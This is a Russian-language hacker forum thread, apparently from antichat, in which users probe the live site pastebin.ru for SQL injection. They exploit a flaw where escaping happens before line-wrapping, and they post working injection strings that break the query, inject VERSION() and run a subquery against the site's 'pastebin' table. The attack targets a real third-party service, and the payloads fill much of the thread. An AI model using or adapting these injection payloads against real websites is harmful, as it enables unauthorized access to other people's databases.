![]() |
Давайте хекнем pastebin.ru
:D
В общем хотел запостить туда скриптег, а он мне MySQL error кинул, ну поудаляв куски кода, понял ато у него аллергия на этот код Код:
чё тут было неважно :)Код:
Query failure: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; ?>',303345)' at line 1 |
АГА!!! Я ПОНЯЛ!!!
Щас раскажу :)) Тама чтобы код не разъежал сайт его режут, токо тама сначало идёт экранирование, потом режут, хы хы (кстате надо у себя проверить такую уязвимость) И такой код Код:
a''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''Получается Код:
...\'\'\'\'\<перенос>'\'\'\'Нате, вот Код:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaa'aПойду фиксить |
Цитата:
PS мне больше нравится pastebin.com |
zlo12, да нет, тут были месаги но их потёрли
Получается я новый вид SQL inj уязвимостей нащёл? :DDD wordwrap() зло ShAnKaR, ну чтоб закрыть запрос нужна ещё одна ковычка, а она получится только с слэшем \ ну вобще если мозг помучать то может чёнибудь и получится... P.S. А ведь ачать тоже режет так месаги О_о Хммм... Хы, тут правильно, сначала wordwrap потом экранирование :( |
зачем собственно его хакать?
|
Хотя вот....
Код:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbabbbbbbbbbbbbbbbbbbbaaaaaaaa',QUERY)/* |
Цитата:
|
ЕСТЬ!1111
Код:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbabbbbbbbbbbbbbbbbbbbaaaaaaaa'+VERSION(),1)/* |
Цитата:
http://forum.antichat.ru/showpost.php?p=911841&postcount=2 http://forum.antichat.ru/showpost.php?p=970729&postcount=3 |
Чёто непонимаю чё он от мя хочет
Код:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbabbbbbbbbbbbbbbbbbbbaaaaaaaa'+(SELECT COUNT(*) FROM pastebin),1)/* |
| Время: 03:43 |